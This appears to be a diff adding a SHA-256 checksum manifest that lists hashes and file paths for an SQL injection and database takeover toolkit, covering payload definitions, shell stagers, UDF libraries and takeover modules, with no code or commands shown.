+39a8a35d730f49daf657fa58903a9cd309813b275df29a86439297a10a15261a  data/html/index.html
+e70317eb90f7d649e4320e59b2791b8eb5810c8cad8bc0c49d917eac966b0f18  data/procs/mssqlserver/activate_sp_oacreate.sql
+6a2de9f090c06bd77824e15ac01d2dc11637290cf9a5d60c00bf5f42ac6f7120  data/procs/mssqlserver/configure_openrowset.sql
+798f74471b19be1e6b1688846631b2e397c1a923ad8eca923c1ac93fc94739ad  data/procs/mssqlserver/configure_xp_cmdshell.sql
+5dfaeac6e7ed4c3b56fc75b3c3a594b8458effa4856c0237e1b48405c309f421  data/procs/mssqlserver/create_new_xp_cmdshell.sql
+3c8944fbd4d77b530af2c72cbabeb78ebfb90f01055a794eede00b7974a115d0  data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
+afb169095dc36176ffdd4efab9e6bb9ed905874469aac81e0ba265bc6652caa4  data/procs/mssqlserver/dns_request.sql
+657d56f764c84092ff4bd10b8fcbde95c13780071b715df0af1bc92b7dd284f2  data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
+1b7d521faca0f69a62c39e0e4267e18a66f8313b22b760617098b7f697a5c81d  data/procs/mssqlserver/run_statement_as_user.sql
+9b8b6e430c705866c738dd3544b032b0099a917d91c85d2b25a8a5610c92bcdf  data/procs/mysql/dns_request.sql
+02b7ef3e56d8346cc4e06baa85b608b0650a8c7e3b52705781a691741fc41bfb  data/procs/mysql/write_file_limit.sql
+02be5ce785214cb9cac8f0eab10128d6f39f5f5de990dea8819774986d0a7900  data/procs/oracle/dns_request.sql
+606fe26228598128c88bda035986281f117879ac7ff5833d88e293c156adc117  data/procs/oracle/read_file_export_extension.sql
+4d448d4b7d8bc60ab2eeedfe16f7aa70c60d73aa6820d647815d02a65b1af9eb  data/procs/postgresql/dns_request.sql
+7e3e28eac7f9ef0dea0a6a4cdb1ce9c41f28dd2ee0127008adbfa088d40ef137  data/procs/README.txt
+3fa42f7428a91d94e792ad8d3cb76109cfe2632d918ae046e32be5a2b51ad3d8  data/shell/backdoors/backdoor.asp_
+7943c1d1e8c037f5466f90ed91cc88441beb0efab83ef5ae98473d2aee770b65  data/shell/backdoors/backdoor.aspx_
+9d9d0bdd4145df96058977a39be924f0facdba9efa7b585848101dafbcb7b02e  data/shell/backdoors/backdoor.jsp_
+8a7a73a4c841e92ece79942e03a18df046f90ba43e6af6c4f8fbb77f437bce07  data/shell/backdoors/backdoor.php_
+a08e09c1020eae40b71650c9b0ac3c3842166db639fdcfc149310fc8cf536f64  data/shell/README.txt
+67ce7eec132297594f7fd31f93f8d044df3d745c01c70c5afc320848eb4aa149  data/shell/stagers/stager.asp_
+099eb0f9ed71946eb55bd1d4afa1f1f7ef9f39cc41af4897f3d5139524bd2fc2  data/shell/stagers/stager.aspx_
+f2648a0cb4d5922d58b8aa6600f786b32324b9ac91e3a57e4ff212e901ffe151  data/shell/stagers/stager.jsp_
+84b431647a2c13e72b2c9c9242a578349d1b8eef596166128e08f1056d7e4ac8  data/shell/stagers/stager.php_
+f07b7f4e3f073ce752bda6c95e5a328572b82eb2705ee99e2a977cc4e3e9472b  data/txt/common-columns.txt
+882a18f1760f96807cceb90023cff919ac6804dde2a6ddd8af26f382aa3e93eb  data/txt/common-files.txt
+1e626d38f202c1303fa12d763b4499cf6a0049712a89829eeed0dd08b2b0957f  data/txt/common-outputs.txt
+8c57f1485d2f974b7a37312aa79cedefcca7c4799b81bbbb41736c39d837b48d  data/txt/common-tables.txt
+f20771d6aba7097e262fe18ab91e978e9ac07dafce0592c88148929a88423d89  data/txt/keywords.txt
+c5ce8ea43c32bc72255fa44d752775f8a2b2cf78541cbeaa3749d47301eb7fc6  data/txt/smalldict.txt
+4f6ee5c385a925372c4a4a0a65b499b9fc3f323a652d44b90892e742ef35c4c1  data/txt/user-agents.txt
+9c2d6a0e96176447ab8758f8de96e6a681aa0c074cd0eca497712246d8f410c6  data/txt/wordlist.tx_
+849c61612bd0d773971254df2cc76cc18b3d2db4051a8f508643278a166df44e  data/udf/mysql/linux/32/lib_mysqludf_sys.so_
+20b5a80b8044da1a0d5c5343c6cbc5b71947c5464e088af466a3fcd89c2881ef  data/udf/mysql/linux/64/lib_mysqludf_sys.so_
+8e6ae0e3d67e47261df064aa1536f99e56d4f001cc7f800c3d93b091c3c73115  data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
+51d055d00863655e43e683377257953a19728a0ae9a3fe406768289474eb4104  data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
+9340f3d10dcca0d72e707f22cf1c4c6581b979c23d6f55a417ee41d9091bb9d1  data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
+dc1199c029dff238e971fd3250916eb48503daa259464c24f22cd2cd51f5ccd8  data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
+0b6a7e34fbbd27adaa8beda36ce20e93fd65b8e3ce93bf44703c514ebdd1cef0  data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
+922fb68413b05031e9237414cf50a04e0e43f0d1c7ef44cfb77305eea0b6f2fe  data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
+029ffa3b30a4c6cb10f5271b72c2a6b8967cdab0d23c8e4b0e5e75e2a5c734f2  data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
+52f9a6375099cb9c37ca1b8596c2e89a75ed6b8a2493b486ef3cd0230eaa6591  data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
+436e0bf6961f4d25321a6fe97bfa73ab2926175d5b93e9c4b0dbcd38a926ca31  data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
+6817b485450aed7a634ece8c6c12007ab38e6954c8cbc7a530b101347e788cbc  data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
+a2de5ca53411f38dadc1535a58d7416a3758a126feec6becb4e0e33c974825f3  data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
+17e2f86c94b4cffb8de37b10456142f5a1bf3d500345bf508f16c9a359fbf005  data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
+5ffdaac7d85ac18e5bbae2776522d391d92ca18b2862c3d1d03fa90effcfb918  data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
+5fae599c42bb650a2c0ba8111ca64d52bb82ac1ea0e982a3c0f59587d166eb5b  data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
+ded0da0260fea0c91e02839d2e06e62741cc25ac5d74b351b0a26e0c0abcd8de  data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
+81e9f38cb47753f5b9f472eddd227023c44f6b302b7c03eca65dd9836856de69  data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
+87b0d86661eaf8bf58664a3aa241cc33525cf3dc1043ed60a82cf123d8ae3873  data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
+925a7b8a3904906b8402e707ed510e9ac7598ee30a90f5464d14a3678998cb90  data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
+c55ac17eaf8f4353ac1abbecb3165ebfceeed438780f9c1d8eb863a6f40d64f4  data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
+aecdef1198ad2bdfdebc82ba001b6d6c2d08cc162271a37d0a55ae8e5a0e3aa0  data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
+f128717b9930c4fd919da004dacc50487923d56239a68a2566d33212acc09839  data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
+965355721e6d5ada50e3f0fe576f668ee62adae0810a34c8024fb40c5301443b  data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
+adfb9f1841af68b03f7dfe68234236034cb09d6be28902eda7d66792b667b58a  data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
+b0d30e633532c28f693fbb91a67274b3d347cbefa0dfae8d6dafa2b934d9be14  data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
+7acbfe3ddd2d0083fe5d6a9f614008b0659539a5401bdf99d9bcd3667901e4dc  data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
+191dc3607fdb4bad4e4231fd0d63c5926aa4055df024a083ea0ec0bbec6e3258  data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
+a6717d5da8c4515f9b53bcd2343a4d496dbdcf92c5b05e210f62731e2fa89ce7  data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
+611e1f025b919a75ec9543720cac4b02669967dab46e671f0328e75314852951  data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
+b427b65cc8b585cd02361f5155ffab2fe52fd5943100382c6b86cd0f52f352d9  data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
+c444fd667a09927a22c92e855d206249e761c1fbd4f3630f7ee06265eb2576ee  data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
+c6be099a5dee34f3a7570715428add2e7419f4e73a7ce9913d3fb76eea78d88e  data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
+0a6d5fc399e9958477c8a71f63b7c7884567204253e0d2389a240d83ed83f241  data/udf/README.txt
+4e268596da67fb0b6a10a7cefb38af5de13f67dab760cc0505f8f80484a0fe79  data/xml/banner/generic.xml
+2adcdd08d2c11a5a23777b10c132164ed9e856f2a4eca2f75e5e9b6615d26a97  data/xml/banner/mssql.xml
+14b18da611d4bfad50341df89f893edf47cd09c41c9662e036e817055eaa0cfb  data/xml/banner/mysql.xml
+6d1ab53eeac4fae6d03b67fb4ada71b915e1446a9c1cc4d82eafc032800a68fd  data/xml/banner/oracle.xml
+9f4ca1ff145cfbe3c3a903a21bf35f6b06ab8b484dad6b7c09e95262bf6bfa05  data/xml/banner/postgresql.xml
+86da6e90d9ccf261568eda26a6455da226c19a42cc7cd211e379cab528ec621e  data/xml/banner/server.xml
+146887f28e3e19861516bca551e050ce81a1b8d6bb69fd342cc1f19a25849328  data/xml/banner/servlet-engine.xml
+7973d2024e7803951445a569b591e151edcc322c00213f478dcd9aff23afd226  data/xml/banner/set-cookie.xml
+a7eb4d1bcbdfd155383dcd35396e2d9dd40c2e89ce9d5a02e63a95a94f0ab4ea  data/xml/banner/sharepoint.xml
+e2febc92f9686eacf17a0054f175917b783cc6638ca570435a5203b03245fc18  data/xml/banner/x-aspnet-version.xml
+75672f8faa8053af0df566a48700f2178075f67c593d916313fcff3474da6f82  data/xml/banner/x-powered-by.xml
+1ac399c49ce3cb8c0812bb246e60c8a6718226efe89ccd1f027f49a18dbeb634  data/xml/boundaries.xml
+130eef6c02dc5749f164660aa4210f75b0de35aaf2afef94b329bb1e033851f7  data/xml/errors.xml
+cfa1f0557fb71be0631796a4848d17be536e38f94571cf6ef911454fbc6b30d1  data/xml/payloads/boolean_blind.xml
+f2b711ea18f20239ba9902732631684b61106d4a4271669125a4cf41401b3eaf  data/xml/payloads/error_based.xml
+b0f434f64105bd61ab0f6867b3f681b97fa02b4fb809ac538db382d031f0e609  data/xml/payloads/inline_query.xml
+0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689  data/xml/payloads/stacked_queries.xml
+997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1  data/xml/payloads/time_blind.xml
+40a4878669f318568097719d07dc906a19b8520bc742be3583321fc1e8176089  data/xml/payloads/union_query.xml
+95b7464b1a7b75e2b462d73c6cca455c13b301f50182a8b2cd6701cdcb80b43e  data/xml/queries.xml
+abb6261b1c531ad2ee3ada8184c76bcdc38732558d11a8e519f36fcc95325f7e  doc/AUTHORS
+68550be6eeb800bb54b1b47877412ecc88cf627fb8c88aaee029687152eb3fc1  doc/CHANGELOG.md
+2df1f15110f74ce4e52f0e7e4a605e6c7e08fbda243e444f9b60e26dfc5cf09d  doc/THANKS.md
+f939c6341e3ab16b0bb9d597e4b13856c7d922be27fd8dba3aa976b347771f16  doc/THIRD-PARTY.md
+792bcf9bf7ac0696353adaf111ee643f79f1948d9b5761de9c25eb0a81a998c9  doc/translations/README-bg-BG.md
+7f48875fb5a369b8a8aaefc519722462229ce4e6c7d8f15f7777092d337e92dd  doc/translations/README-ckb-KU.md
+4689fee6106207807ac31f025433b4f228470402ab67dd1e202033cf0119fc8a  doc/translations/README-de-DE.md
+2b3d015709db7e42201bc89833380a2878d7ab604485ec7e26fc4de2ad5f42f0  doc/translations/README-es-MX.md
+f7b6cc0d0fdd0aa5550957db9b125a48f3fb4219bba282f49febc32a7e149e74  doc/translations/README-fa-IR.md
+3eac203d3979977b4f4257ed735df6e98ecf6c0dfcd2c42e9fea68137d40f07c  doc/translations/README-fr-FR.md
+26524b18e5c4a1334a6d0de42f174b948a8c36e95f2ec1f0bc6582a14d02e692  doc/translations/README-gr-GR.md
+d505142526612a563cc71d6f99e0e3eed779221438047e224d5c36e8750961db  doc/translations/README-hr-HR.md
+a381ff3047aab611cf1d09b7a15a6733773c7c475c7f402ef89e3afe8f0dd151  doc/translations/README-id-ID.md
+e88d3312a2b3891c746f6e6e57fbbd647946e2d45a5e37aab7948e371531a412  doc/translations/README-in-HI.md
+34a6a3a459dbafef1953a189def2ff798e2663db50f7b18699710d31ac0237f8  doc/translations/README-it-IT.md
+2120fd640ae5b255619abae539a4bd4a509518daeff0d758bbd61d996871282f  doc/translations/README-ja-JP.md
+a8027759aaad33b38a52533dbad60dfba908fe8ac102086a6ad17162743a4fd9  doc/translations/README-ka-GE.md
+343e3e3120a85519238e21f1e1b9ca5faa3afe0ed21fbb363d79d100e5f4cf0c  doc/translations/README-ko-KR.md
+f04fce43c6fb217f92b3bcae5ec151241d3c7ce951f5b98524d580aa696c5fa2  doc/translations/README-nl-NL.md
+fc304f77f0d79ac648220cb804e5683abdf0f7d61863dda04a415297d1a835f4  doc/translations/README-pl-PL.md
+f8a4659044c63f9e257960110267804184a3a9d5a109ec2c62b1f47bc45184e7  doc/translations/README-pt-BR.md
+42f5d2ebffcf4b1be52005cc3e44f99df2c23713bd15c2bcedfe1c77760c3cf1  doc/translations/README-rs-RS.md
+c94d5c9ae4e4b996eaf0d06a6c5323a12f22653bb53c5eaf5400ee0bccf4a1eb  doc/translations/README-ru-RU.md
+622d9a1f22d07e2fefdebbd6bd74e6727dc14725af6871423631f3d8a20a5277  doc/translations/README-sk-SK.md
+6d690c314fe278f8f949b27cd6f7db0354732c6112f2c8f764dcf7c2d12d626f  doc/translations/README-tr-TR.md
+0bccce9d2e48e7acc1ef126539a50d3d83c439f94cc6387c1331a9960604a2cd  doc/translations/README-uk-UA.md
+285c997e8ae7381d765143b5de6721cad598d564fd5f01a921108f285d9603a2  doc/translations/README-vi-VN.md
+b553a179c731127a115d68dfb2342602ad8558a42aa123050ba51a08509483f6  doc/translations/README-zh-CN.md
+783ddbaa638d2d2987be7aa2e9e9e40aef8c0b7a132db60949e43bc733d01978  extra/beep/beep.py
+509276140d23bfc079a6863e0291c4d0077dea6942658a992cbca7904a43fae9  extra/beep/beep.wav
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  extra/beep/__init__.py
+3b54434b0d00c8fd12328ef8e567821bd73a796944cb150539aa362803ab46e5  extra/cloak/cloak.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  extra/cloak/__init__.py
+6879b01859b2003fbab79c5188fce298264cd00300f9dcecbe1ffd980fe2e128  extra/cloak/README.txt
+30f8aa9e7243443c9cfc21d2550036b2eda42414e1275145e5a97d2576149ca5  extra/dbgtool/dbgtool.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  extra/dbgtool/__init__.py
+a777193f683475c63f0dd3916f86c4b473459640c3278ff921432836bc75c47f  extra/dbgtool/README.txt
+a87035e5923f5b56077dfbd18cda5aa5e2542f0707b7b55f7bbeb1960ae3cc9a  extra/icmpsh/icmpsh.exe_
+2fcce0028d9dd0acfaec497599d6445832abad8e397e727967c31c834d04d598  extra/icmpsh/icmpsh-m.c
+8c38efaaf8974f9d08d9a743a7403eb6ae0a57b536e0d21ccb022f2c55a16016  extra/icmpsh/icmpsh-m.pl
+12014ddddc09c58ef344659c02fd1614157cfb315575378f2c8cb90843222733  extra/icmpsh/icmpsh_m.py
+1589e5edeaf80590d4d0ce1fd12aa176730d5eba3bfd72a9f28d3a1a9353a9db  extra/icmpsh/icmpsh-s.c
+ab6ee3ee9f8600e39faecfdaa11eaa3bed6f15ccef974bb904b96bf95e980c40  extra/icmpsh/__init__.py
+27af6b7ec0f689e148875cb62c3acb4399d3814ba79908220b29e354a8eed4b8  extra/icmpsh/README.txt
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  extra/__init__.py
+191e3e397b83294082022de178f977f2c59fa99c96e5053375f6c16114d6777e  extra/runcmd/README.txt
+25be5af53911f8c4816c0c8996b5b4932543efd6be247f5e18ce936679e7d1cd  extra/runcmd/runcmd.exe_
+70bd8a15e912f06e4ba0bd612a5f19a6b35ed0945b1e370f9b8700b120272d8f  extra/runcmd/src/README.txt
+084aea8f337e1aed405a581603324ec01951eadcfd7b4eefaf3000b73f8b2e1e  extra/runcmd/src/runcmd/runcmd.cpp
+e5c02d18abf544eebd18bd789121eaee4d638bae687402feafdd6daec18e82a1  extra/runcmd/src/runcmd/runcmd.vcproj
+7c2a12c21b61f727a2b3c6e85bd098e7f8a8b585a74b5eb31eb676ac776d5d57  extra/runcmd/src/runcmd.sln
+5e67c579a62715812a56731396d4cb432f16774a69f82629c6a3218174333605  extra/runcmd/src/runcmd/stdafx.cpp
+7bd768f3a742dcebddbe76de26eeee1438355d8600fb19dce945eef6486a3edb  extra/runcmd/src/runcmd/stdafx.h
+38f59734b971d1dc200584936693296aeebef3e43e9e85d6ec3fd6427e5d6b4b  extra/shellcodeexec/linux/shellcodeexec.x32_
+b8bcb53372b8c92b27580e5cc97c8aa647e156a439e2306889ef892a51593b17  extra/shellcodeexec/linux/shellcodeexec.x64_
+cfa1f8d02f815c4e8561f6adbdd4e84dda6b6af6c7a0d5eeb9d7346d07e1e7ad  extra/shellcodeexec/README.txt
+cb43de49a549ae5524f3066b99d6bc3b0b684c6e68c2e75602e87b2ac5718716  extra/shellcodeexec/windows/shellcodeexec.x32.exe_
+384805687bfe5b9077d90d78183afcbd4690095dfc4cc12b2ed3888f657c753c  extra/shutils/autocompletion.sh
+9ed66a22c6d21645a9a80cf54e6ea44582336bb0bd432c789b2bc37edcff482d  extra/shutils/blanks.sh
+f3d8033f8c451ae28ca4b8f65cf2ceb77fadba21f11f19229f08398cbf523bc6  extra/shutils/drei.sh
+2462efbca0d1572d2e6d380c8be48caa9e6d481b3b42ebe5705de4ba93e6c9fe  extra/shutils/duplicates.py
+336aebaff9a9a9339c71a03b794ec52429c4024a9ebfd7e5a60c196fad21326e  extra/shutils/junk.sh
+8779e1a56165327e49bbfd6cb2a461ab18cd8a83e9bfc139c9bdfc8e44f2a23f  extra/shutils/modernize.sh
+74fe683e94702bef6b8ea8eebb7fc47040e3ef5a03dec756e3cf4504a00c7839  extra/shutils/newlines.py
+fed05c468af662ba6ca6885baf8bf85fec1e58f438b3208f3819ad730a75a803  extra/shutils/postcommit-hook.sh
+dc35b51f5c9347eda8130106ee46bb051474fc0c5ed101f84abf3e546f729ceb  extra/shutils/precommit-hook.sh
+1909f0d510d0968fb1a6574eec17212b59081b2d7eb97399a80ba0dc0e77ddd1  extra/shutils/pycodestyle.sh
+026af5ba1055e85601dcdcb55bc9de41a6ee2b5f9265e750c878811c74dee2b0  extra/shutils/pydiatra.sh
+2ce9ac90e7d37a38b9d8dcc908632575a5bafc4c75d6d14611112d0eea418369  extra/shutils/pyflakes.sh
+ab70028ea7e47484486b88354ed9ef648aac08ccba74a9507e5a401067f13997  extra/shutils/pylint.sh
+02adeb5acf8f9330ce5e5f36c9a98d6114948c6040f76dd4f1ed3385d72f6d6f  extra/shutils/pypi.sh
+df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264  extra/shutils/recloak.sh
+1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f  extra/shutils/strip.sh
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  extra/vulnserver/__init__.py
+9fb22b629ffb69d9643230f7bea50b0ad25836058647a3b2e88a1e254aa3ce74  extra/vulnserver/vulnserver.py
+66d14fc303b061ccf983bf3ff84b5e1345c4fe643b662fbc5ec1a924d6415aee  lib/controller/action.py
+f0a3c3a555920b7e9321c234b54718e3d70f8ca33a8560a389c3b981e98c1585  lib/controller/checks.py
+d7b1d29dfa0e4818553259984602410b14c60803cae9c9bb7b249ed7ad71a3f6  lib/controller/controller.py
+de2b0220db1c79d8720b636d267b11e117151f5f99740567096e9b4cbb7cc9d5  lib/controller/handler.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/controller/__init__.py
+41c7fb7e486c4383a114c851f0c32c81c53c2b4f1d2a0fd99f70885072646387  lib/core/agent.py
+f848dcfdacb5143f803f4e9474cf3eef939039c26c522ca09777c425661300f0  lib/core/bigarray.py
+129bcc6342e2398c9d66204524ceb005121b83a23311e0724891d4cd0abd17a5  lib/core/common.py
+88fbbe7c41511b17d7ef449d675a84eaa80cac6ebf457a18577eadd62f6f1330  lib/core/compat.py
+5ce8f2292f99d17d69bfc40ded206bfdfd06e2e3660ff9d1b3c56163793f8d1c  lib/core/convert.py
+f561310b3cea570cc13d9f0aff16cce8b097d51275f8b947e7fff4876ac65c32  lib/core/data.py
+e050353f74c0baaf906ffca91dd04591645455ae363ae732a7a23f91ffe2ef1c  lib/core/datatype.py
+bdd1b5b3eb42cffdc1be78b8fe4e1bb2ec17cd86440a7aeb08fc599205089e94  lib/core/decorators.py
+9219f0bd659e4e22f4238ca67830adcb1e86041ce7fd3a8ae0e842f2593ae043  lib/core/defaults.py
+ec8d94fb704c0a40c88f5f283624cda025e2ea0e8b68722fe156c2b5676f53ac  lib/core/dicts.py
+65fb5a2fc7b3bb502cc2db684370f213ab76bff875f3cf72ef2b9ace774efda9  lib/core/dump.py
+0e28c66ea9dfa1b721cfca63c364bdc139f53ebc8f9c57126b0af7dc6b433dcc  lib/core/enums.py
+64bf6a5c2e456306a7b4f4c51f077412daf6c697fed232d8e23b77fd1a4c736e  lib/core/exception.py
+93c256111dc753967169988e1289a0ea10ec77bfb8e2cbd1f6725e939bfbc235  lib/core/gui.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/core/__init__.py
+53499dc202a036289e3b2b9699d19568e794d077e16fd3a5c91771983de45451  lib/core/log.py
+eb1890d111e6187cac4cf81c3a525e95e7061607847d4f05ec23f9dba8febdcd  lib/core/optiondict.py
+ceea031ce1a49a20af689d750d33d057e38a7c631f008872b04f380e2de39bb9  lib/core/option.py
+81275fdbd463d89a2bfd8c00417a17a872aad74f34c18e44be79c0503e67dfa5  lib/core/patch.py
+e79df3790f16f67988e46f94b0a516d7ee725967f7698c8e17f210e4052203a7  lib/core/profiling.py
+c6a182f6b7d3b0ad6f0888ea2a4de4148f0770549038d7de8bc3267b4c6635f7  lib/core/readlineng.py
+63ae69713c6ea9abfa10e71dfab8f2dcf42432177a38d2c1e98785bf1468674c  lib/core/replication.py
+5bad5bc7115051cef7b84efa73fbafbf5e1db46eef32a445056b56cda750b66f  lib/core/revision.py
+0dcb52c9c76a4b0acf2e9038f7d8f08c14543cef3cf7032831c6c0a99376ad24  lib/core/session.py
+6528a19e5de32fb02c3045c31bc928179c5d812211dde48cf237c3fbc2567a56  lib/core/settings.py
+a1e4f2860bffc73bbf2e5db293fa49dcb600ea35f950cda43dc953b3160ab3db  lib/core/shell.py
+841716e87b90a3b598515910841f7cf8d33bb87c24a27fba1a80e36a831cbcd7  lib/core/subprocessng.py
+9731092f195e346716929323ea3c93247b23b9b92b0f32d3fd0acc3adf9876cc  lib/core/target.py
+b1071f449a66b4ceacd4b84b33a73d9e0a3197d271d72daaa406ba473a8bb625  lib/core/testing.py
+3b47307b044c07389eec05d856403a94c9b8bd0d36aeaab11ef702b33ae499d0  lib/core/threads.py
+69b86b483368864639b9d41ff70ab0f2c4a28d4ad66b590f95ccba0566605c69  lib/core/unescaper.py
+40fef2dcaaf9cfd9e78aeb14dc6639b7369738802cd473eedeedc5a51f9db0e1  lib/core/update.py
+12cbead4e9e563b970fafb891127927445bd53bada1fac323b9cd27da551ba30  lib/core/wordlist.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/__init__.py
+a027f4c44811cb74aa367525f353706de3d3fc719e6c6162f7a61dc838acf0c2  lib/parse/banner.py
+9c7f95948cb6ee20b2b5bff7b36c23179c44303d3c8ad555247f65f12f30e0a9  lib/parse/cmdline.py
+3907765df08c31f8d59350a287e826bd315a7714dc0e87496f67c8a0879c86ac  lib/parse/configfile.py
+ced03337edd5a16b56a379c9ac47775895e1053003c25f6ba5bec721b6e3aa64  lib/parse/handler.py
+3704a02dcf00b0988b101e30b2e0d48acdd20227e46d8b552e46c55d7e9bf28c  lib/parse/headers.py
+d6a9ef3ace86ad316e5a69b172159a0b35d89f9861c8ed04a32650105f5d78b7  lib/parse/html.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/parse/__init__.py
+e92ecb7fb9dc879a58598f6ccf08702998eb163d21a70cd728bd6e27e182792b  lib/parse/payloads.py
+cbabdde72df4bd8d6961d589f1721dd938d8f653aa6af8900a31af6e2586405d  lib/parse/sitemap.py
+87109063dd336fe2705fdfef23bc9b340dcc58e410f15c372fab51ea6a1bf4b1  lib/request/basicauthhandler.py
+89417568d7f19e48d39a8a9a4227d3d2b71d1c9f61139a41b1835fb5266fcab8  lib/request/basic.py
+6139b926a3462d14ddd50acdb8575ae442b8fab089db222721535092b9af3ea1  lib/request/chunkedhandler.py
+ad661a075c6df0624747722d77ca3b1f69f36e54708e33673a33cfdef1ed5075  lib/request/comparison.py
+65c57ca9de892b6b7b55e1b13392f94e831710f7d21755a7d85eb6db4f61eb41  lib/request/connect.py
+0649a39c5cc2fc0f4c062b100ced17e3e6934a7e578247dfc65b650edc29825e  lib/request/direct.py
+5283754cf387ce4e645ee50834ee387cde29a768aaada1a6a07c338da216c94d  lib/request/dns.py
+2dd88e1f75c0ee54c335d5d0d9199216194aa299bd8ce99dca333c2e4f9ea38b  lib/request/httpshandler.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/request/__init__.py
+64442b90c1e02b23db3ed764a0588f9052b96c4690b234af1682b3b7e52d51a8  lib/request/inject.py
+6ac4235e40dda2d51b21c2199374eb30d53a5b40869f80055df0ac34fbe59351  lib/request/methodrequest.py
+696700e094142d64133f34532eb1953a589727b007cac4b8ed757b75b36df1d8  lib/request/pkihandler.py
+347b33b075c2a05d4fdf05449b09e0dc5e9f041f01063a7a3b02c9ae33d54c43  lib/request/rangehandler.py
+f22b30b14a68f1324de6e17df8b6e3a894f203ba8b271411914fe4cf5a4c4f52  lib/request/redirecthandler.py
+8933412a100cd78eb24dcacd42ba0e416a8d589a7df11fa77f4c00b1e929e045  lib/request/templates.py
+e179c94f5677c57f7a4affa4b641d132ae076e04de5440706a4a4a7a5142c613  lib/takeover/abstraction.py
+c512e9a3cfc4987839741599bc1f5fbf82f4bf9159398f3749139cf93325f44d  lib/takeover/icmpsh.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/takeover/__init__.py
+6c68a6a379bf1a5d0ca5e0db0978e1c1b43f0964c0762f1949eda44cccce8cec  lib/takeover/metasploit.py
+a80176c3bab60af1f45483b1121f2c5a8d0c269eebe0415f78d058302b646aea  lib/takeover/registry.py
+782ca6271d74dbbed8db223ea6fdc23bbaee5787bbb4112e7b6267f8c6cd9b82  lib/takeover/udf.py
+ec77bee2f221157aff16ec518ca2f3f8359952cd0835f70dd6a5cd8d57caf5bc  lib/takeover/web.py
+21f2ccd7363b1da8f4f0b1e5050ed2a6806914d2d13e280d7a6635ce127823c3  lib/takeover/xp_cmdshell.py
+8a09c54f9020ca170ddc6f41005c8b03533d6f5961a2bb9af02337b8d787fe3e  lib/techniques/blind/inference.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/techniques/blind/__init__.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/techniques/dns/__init__.py
+1b8b4fe2088247f99b96ccab078a8bd72dc934d7bd155498eec2a77b67c55daf  lib/techniques/dns/test.py
+9120019b1a87e0df043e815817b8bfb9965bda6f6fa633dc667c940865bb830c  lib/techniques/dns/use.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/techniques/error/__init__.py
+5063c30a821da00d0935b4e6c2f668f35818c8a6c2005e2e0074f491366f7725  lib/techniques/error/use.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/techniques/__init__.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/techniques/union/__init__.py
+3349573564c035ef7c3dbca7da3aecde139f31621395a1a6a7d2eef1dccbb9b0  lib/techniques/union/test.py
+b781403433a2ad9a18fa9b1cc291165f04f734942268b4eba004a53afe8abe49  lib/techniques/union/use.py
+c09927bccdbdb9714865c9a72d2a739da745375702a935349ddb9edc1d50de70  lib/utils/api.py
